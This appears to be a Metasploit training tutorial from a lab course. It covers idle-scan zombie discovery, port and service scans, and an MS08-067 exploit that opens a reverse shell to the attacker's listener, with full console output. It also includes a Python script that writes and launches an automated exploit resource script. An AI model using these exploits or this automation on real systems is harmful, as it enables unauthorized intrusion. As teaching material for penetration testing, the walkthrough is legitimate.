Information Security (old version)/Metasploit 2016. 6. 1. 11:31
Metasploit - 02. Metasploit commands and usage
This material was put together for hands-on practice in a training course. If it is used for personal or malicious purposes, legal responsibility lies with the person doing so.
[Lab systems] Kali Linux, Firewall, CentOS, Windows 2008, Windows XP
- Pick up the commands and usage through short examples; learning them from the help output alone is hard.
root@kali:~# msfconsole
[Lab steps]
Scan -> exploit a vulnerability -> obtain an ID/PASSWORD -> plant malicious code -> take control
1. Scanning
Ex1) Idle Scan
- Scans each host's IP ID (IPID) sequence to find a quiet host whose address can be spoofed, i.e. a "zombie" for an idle scan. An idle scan only works through a zombie whose IP ID counter advances predictably with every packet it sends and that is otherwise not talking on the network.
msf > search scanner
~ omitted ~
msf > search ipidseq
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ip/ipidseq normal IPID Sequence Scanner
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) >
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface <- interface to send the probes on
RHOSTS yes The target address range or CIDR identifier <- target address or range
RPORT 80 yes The target port <- target port
SNAPLEN 65535 yes The number of bytes to capture <- capture length per packet
THREADS 1 yes The number of concurrent threads <- thread count (low is slow)
TIMEOUT 500 yes The reply read timeout in milliseconds <- reply timeout (lower it on a fast LAN; set it too low and replies from slow hosts are missed)
- no : the option may be left unset
- yes : the option must be set
- THREADS : raise it when there are many targets
msf auxiliary(ipidseq) > check
[-] Check failed: The following options failed to validate: RHOSTS.
msf auxiliary(ipidseq) > set INTERFACE eth1
INTERFACE => eth1
msf auxiliary(ipidseq) > set RHOSTS 192.168.20.0/24
RHOSTS => 192.168.20.0/24
msf auxiliary(ipidseq) > set RPORT 80
RPORT => 80
msf auxiliary(ipidseq) > set THREADS 16
THREADS => 16
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE eth1 no The name of the interface
RHOSTS 192.168.20.0/24 yes The target address range or CIDR identifier
RPORT 80 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 16 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > run
[*] Scanned 29 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] 192.168.20.100's IPID sequence class: All zeros
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201's IPID sequence class: Incremental! <-- quiet host with a predictable IPID (usable as the zombie / spoofed source address)
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.203's IPID sequence class: Incremental! <-- quiet host with a predictable IPID (usable as the zombie / spoofed source address)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
- Scan CentOS (192.168.20.200) through the zombie 192.168.20.201, so the probes appear to come from the zombie's address
-Pn : Treat all hosts as online -- skip host discovery
-sI <zombie host[:probeport]>: Idle scan
msf auxiliary(ipidseq) > db_nmap -Pn -sI 192.168.20.201 192.168.20.200
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 13:44 KST
[*] Nmap: Idle scan using zombie 192.168.20.201 (192.168.20.201:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.20.200
[*] Nmap: Host is up (0.053s latency).
[*] Nmap: Not shown: 988 closed|filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 110/tcp open pop3
[*] Nmap: 111/tcp open rpcbind
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
[*] Nmap: 995/tcp open pop3s
[*] Nmap: MAC Address: 00:0C:29:72:28:7C (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
msf auxiliary(ipidseq) > back
msf >
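The class printed by ipidseq is what decides whether a host can be a zombie, so here is an added example (not part of the original post, and not the module's or Nmap's own source) that reimplements the classification scheme the module borrows from Nmap's IP ID test: the IP ID values a host puts in its replies are classified by the gaps between consecutive values, and only an "Incremental" host is a usable zombie, because an idle scan infers open/closed ports from how far the zombie's counter advanced. The cut-off values are this example's approximation of Nmap's scheme; the IP ID samples are constructed, and the output lines fed to zombie_candidates are copied from the run above.

```python
"""IP ID sequence classification behind auxiliary/scanner/ip/ipidseq.

Added example for this post, not Metasploit's or Nmap's own source. The
cut-offs approximate Nmap's IP ID sequence test; sample data is constructed.
"""
import re

IPID_MOD = 1 << 16  # the IP ID is a 16-bit field, so gaps wrap modulo 65536


def classify_ipids(ipids):
    """Classify one host's observed IP ID values the way ipidseq reports them.

    Rules (first match wins, gaps measured modulo 2**16):
      - any gap above 20000 with 3+ samples      -> "Randomized"
      - every value 0                            -> "All zeros"
      - every gap 0                              -> "Constant"
      - every gap below 10                       -> "Incremental!"
      - every gap a multiple of 256 below 2560   -> "Broken little-endian incremental!"
      - every gap below 1000                     -> "Randomized positive increments!"
      - otherwise                                -> "Randomized"
    Only "Incremental!" hosts are candidates for an idle-scan zombie.
    """
    if len(ipids) < 2:
        return "Unknown"
    gaps = []
    for prev, cur in zip(ipids, ipids[1:]):
        gap = (cur - prev) % IPID_MOD
        if len(ipids) > 2 and gap > 20000:
            return "Randomized"
        gaps.append(gap)
    if all(v == 0 for v in ipids):
        return "All zeros"
    if all(g == 0 for g in gaps):
        return "Constant"
    if all(g < 10 for g in gaps):
        return "Incremental!"
    if all(g % 256 == 0 and g < 2560 for g in gaps):
        return "Broken little-endian incremental!"
    if all(g < 1000 for g in gaps):
        return "Randomized positive increments!"
    return "Randomized"


# One line per host, in the format the module prints ("[*] <ip>'s IPID sequence class: <class>")
CLASS_LINE = re.compile(r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3})'s IPID sequence class: (?P<cls>.+)$")


def zombie_candidates(output_lines):
    """Pick the hosts ipidseq reported as Incremental; these can serve as -sI zombies."""
    zombies = []
    for line in output_lines:
        m = CLASS_LINE.match(line.strip())
        if m and m.group("cls").startswith("Incremental"):
            zombies.append(m.group("ip"))
    return zombies


# Constructed IP ID samples, as if each host had been probed six times
SAMPLE_IPIDS = {
    "quiet Windows host": [4101, 4102, 4103, 4104, 4105, 4106],  # Incremental!
    "CentOS-like host":   [0, 0, 0, 0, 0, 0],                    # All zeros (what 192.168.20.200 showed above)
    "byte-swapped stack": [512, 768, 1024, 1280, 1536, 1792],    # Broken little-endian incremental!
    "busy host":          [9, 300, 870, 1400, 1700, 2200],       # Randomized positive increments!
    "randomizing stack":  [12, 45000, 3, 60000, 200, 31000],     # Randomized
}

# Output lines copied from the ipidseq run in the post
SAMPLE_OUTPUT = [
    "[*] 192.168.20.100's IPID sequence class: All zeros",
    "[*] 192.168.20.201's IPID sequence class: Incremental!",
    "[*] 192.168.20.200's IPID sequence class: All zeros",
    "[*] 192.168.20.203's IPID sequence class: Incremental!",
]

if __name__ == "__main__":
    for label, ipids in SAMPLE_IPIDS.items():
        print(f"{label:20s} {ipids} -> {classify_ipids(ipids)}")
    print("zombie candidates:", zombie_candidates(SAMPLE_OUTPUT))
```

The "All zeros" and "Randomized" classes are useless for `-sI` because the zombie's counter tells the scanner nothing; a "busy host" with positive but irregular increments is also unusable, since its own traffic drowns out the one-step difference an idle scan looks for. The `zombie_candidates` list is exactly what fed the `db_nmap -sI 192.168.20.201` step above.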
Ex2) SYN Scan
- Checks whether ports on the target are open (it cannot gather the kind of detail nmap does, e.g. service versions)
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) >
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth1
INTERFACE => eth1
msf auxiliary(syn) > set PORTS 1-100
PORTS => 1-100
msf auxiliary(syn) > set RHOSTS 192.168.20.200
RHOSTS => 192.168.20.200
msf auxiliary(syn) > set THREADS 16
THREADS => 16
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE eth1 no The name of the interface
PORTS 1-100 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 16 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.20.200:21
[*] TCP OPEN 192.168.20.200:22
[*] TCP OPEN 192.168.20.200:23
[*] TCP OPEN 192.168.20.200:25
[*] TCP OPEN 192.168.20.200:53
[*] TCP OPEN 192.168.20.200:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) > back
msf >
Ex3) SMB version scan
- Scans Windows hosts over NetBIOS/SMB (TCP 445) and reports the OS version, host name and domain
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS 192.168.20.0/24
RHOSTS => 192.168.20.0/24
msf auxiliary(smb_version) > set THREADS 16
THREADS => 16
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.20.0/24 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 16 yes The number of concurrent threads
msf auxiliary(smb_version) > run
[*] Scanned 29 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201:445 is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN2008) (domain:WORKGROUP)
[*] 192.168.20.203:445 is running Windows XP SP3 (language:Korean) (name:WITH-15B28B4CFD) (domain:WORKGROUP)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) > back
msf >
Ex4) FTP version scan
- Grabs the FTP banner from the target
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) >
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(ftp_version) > set RHOSTS 192.168.20.200
RHOSTS => 192.168.20.200
msf auxiliary(ftp_version) > set THREADS 50
THREADS => 50
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 50 yes The number of concurrent threads
msf auxiliary(ftp_version) > run
[*] 192.168.20.200:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) > back
msf >
2. Exploit tools (find a vulnerability -> attack it)
Ex1) db_nmap scan
-sS : TCP SYN (half-open) scan
-p : port range
msf > db_nmap -sS -p 1-500 192.168.20.203
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 15:52 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.0016s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds
-sS : TCP SYN (half-open) scan
-Pn : Treat all hosts as online -- skip host discovery
-A : Enable OS detection, version detection, script scanning, and traceroute
-p : port range
msf > db_nmap -sS -Pn -A -p 1-500 192.168.20.203
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 15:53 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.00041s latency).
[*] Nmap: Not shown: 488 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp EasyFTP Server ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: | drw-rw-rw- 1 user group 0 Jan 24 12:02 . [NSE: writeable]
[*] Nmap: |_drw-rw-rw- 1 user group 0 Jan 24 12:02 .. [NSE: writeable]
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.20.50], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)
[*] Nmap: |_http-server-header: Microsoft-IIS/5.1
[*] Nmap: |_http-title: Site Not Found
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
[*] Nmap: 148/tcp filtered cronus
[*] Nmap: 197/tcp filtered unknown
[*] Nmap: 291/tcp filtered unknown
[*] Nmap: 336/tcp filtered unknown
[*] Nmap: 396/tcp filtered unknown
[*] Nmap: 443/tcp open https?
[*] Nmap: | http-cisco-anyconnect:
[*] Nmap: |_ ERROR: Not a Cisco ASA or unsupported version
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: | \\192.168.20.203\pipe\sql\query:
[*] Nmap: | Version:
[*] Nmap: | Product: Microsoft SQL Server 2000
[*] Nmap: | Post-SP patches applied: false
[*] Nmap: | number: 8.00.194.00
[*] Nmap: | name: Microsoft SQL Server 2000 RTM
[*] Nmap: | Service pack level: RTM
[*] Nmap: |_ Named pipe: \\192.168.20.203\pipe\sql\query
[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:69:ff:fd (VMware)
[*] Nmap: | smb-os-discovery:
[*] Nmap: | OS: Windows XP (Windows 2000 LAN Manager)
[*] Nmap: | OS CPE: cpe:/o:microsoft:windows_xp::-
[*] Nmap: | Computer name: with-15b28b4cfd
[*] Nmap: | NetBIOS computer name: WITH-15B28B4CFD
[*] Nmap: | Workgroup: WORKGROUP
[*] Nmap: |_ System time: 2016-06-01T15:53:39+09:00
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.41 ms 192.168.20.203
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds
-sS : TCP SYN (half-open) scan
-Pn : Treat all hosts as online -- skip host discovery
-p : port range
--script= : run the named NSE script(s)
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.20.203 (older Nmap only; smb-check-vulns was split into the smb-vuln-* scripts in Nmap 7)
msf > db_nmap -sS -Pn -p 1-500 --script=smb-vuln-ms08-067.nse 192.168.20.203
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-05 19:51 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.00020s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:71:CB:DC (VMware)
[*] Nmap: Host script results:
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.83 seconds
msf >
Ex2) Exploit with the 'windows/shell/reverse_tcp' payload
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ omitted ~
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
~ omitted ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
~ omitted ~
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
~ omitted ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set LHOST 192.168.20.50
LHOST => 192.168.20.50
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > set RHOST 192.168.20.203
RHOST => 192.168.20.203
msf exploit(ms08_067_netapi) > set target 47
target => 47
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.20.203
[*] Command shell session 1 opened (192.168.20.50:8080 -> 192.168.20.203:1051) at 2016-06-01 16:15:10 +0900
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 로컬 영역 연결: <- Korean "Local Area Connection"; the raw transcript showed mojibake here because the XP command shell emits code page 949
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32> (ctrl+c)
Abort session 1? [y/N] y
[*] 192.168.20.203 - Command shell session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
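Putting the smb_version output, the `show targets` table and the exploit step together: the following is an added example (not part of the original post and not Metasploit's own code) that turns the scanner's "is running" lines into a resource script for `msfconsole -r`, choosing the explicit target id by language the way the post does with `set target 47` and falling back to Automatic Targeting otherwise. It writes a check-only script by default and an exploit script on request, because a resource script runs top to bottom and cannot branch on a `check` result. The host lines are copied from the scan above; LHOST 192.168.20.50 and LPORT 8080 are the lab values, and the file name ms08_067.rc is an assumption.

```python
"""From smb_version output to an MS08-067 resource script.

Added example for this post, not Metasploit's own code. It parses the
"<ip>:445 is running ..." lines that auxiliary/scanner/smb/smb_version prints,
maps Windows XP SP3 hosts to an ms08_067_netapi target id by language (using
only the ids visible in the post's `show targets` listing; anything else falls
back to 0, Automatic Targeting) and writes a msfconsole resource script.
LHOST/LPORT are lab values, the file name is an assumption, and msfconsole is
only launched if it is on PATH.
"""
import re
import shutil
import subprocess
import sys

# Matches e.g. "[*] 192.168.20.203:445 is running Windows XP SP3 (language:Korean) (name:X) (domain:WORKGROUP)"
SMB_LINE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):445 is running (?P<os>.+?)"
    r"(?: \(build:(?P<build>\d+)\))?"
    r"(?: \(language:(?P<lang>[^)]+)\))?"
    r" \(name:(?P<name>[^)]+)\) \(domain:(?P<domain>[^)]+)\)$"
)

# Target ids shown by `show targets` for ms08_067_netapi in the post (XP SP3, NX builds)
XP_SP3_NX_TARGETS = {"Hungarian": 44, "Italian": 45, "Japanese": 46, "Korean": 47, "Dutch": 48}
AUTOMATIC_TARGETING = 0


def parse_smb_version(lines):
    """Return one dict (ip, os, build, lang, name, domain) per host line the scanner printed."""
    hosts = []
    for line in lines:
        m = SMB_LINE.match(line.strip())
        if m:
            hosts.append(m.groupdict())
    return hosts


def pick_target(host):
    """Explicit target id when the fingerprint is unambiguous, else Automatic Targeting."""
    if host["os"] == "Windows XP SP3" and host.get("lang") in XP_SP3_NX_TARGETS:
        return XP_SP3_NX_TARGETS[host["lang"]]
    return AUTOMATIC_TARGETING


def build_resource_script(hosts, lhost, lport=8080, exploit=False):
    """Emit msfconsole commands: a check-only pass by default, the exploit pass on request.

    Run the check pass first, read its output, then feed only the hosts that
    came back vulnerable to the exploit pass; the script itself cannot branch.
    """
    cmds = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
    ]
    for host in hosts:
        cmds += [f"set RHOST {host['ip']}", f"set target {pick_target(host)}", "check"]
        if exploit:
            cmds.append("exploit -z")  # -z: keep the session but do not interact, so the script continues
    if exploit:
        cmds.append("sessions -l")
    return "\n".join(cmds) + "\n"


# Lines copied from the smb_version run in the post
SAMPLE_SMB_OUTPUT = [
    "[*] 192.168.20.201:445 is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN2008) (domain:WORKGROUP)",
    "[*] 192.168.20.203:445 is running Windows XP SP3 (language:Korean) (name:WITH-15B28B4CFD) (domain:WORKGROUP)",
]

if __name__ == "__main__":
    do_exploit = "--exploit" in sys.argv
    hosts = parse_smb_version(SAMPLE_SMB_OUTPUT)
    script = build_resource_script(hosts, lhost="192.168.20.50", exploit=do_exploit)
    path = "ms08_067.rc"  # assumed file name
    with open(path, "w") as fh:
        fh.write(script)
    print(script)
    if shutil.which("msfconsole"):
        subprocess.run(["msfconsole", "-q", "-r", path])
    else:
        print(f"msfconsole not found; run: msfconsole -q -r {path}")
```

Run it once without arguments to get the `check` pass, then with `--exploit` for the hosts you have confirmed; the 2008 R2 host is left on Automatic Targeting because the scanner line does not pin it to one of the ids in the table.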
Ex3) Exploit with the 'windows/meterpreter/reverse_tcp' payload
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > unset PAYLOAD
Unsetting PAYLOAD...
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
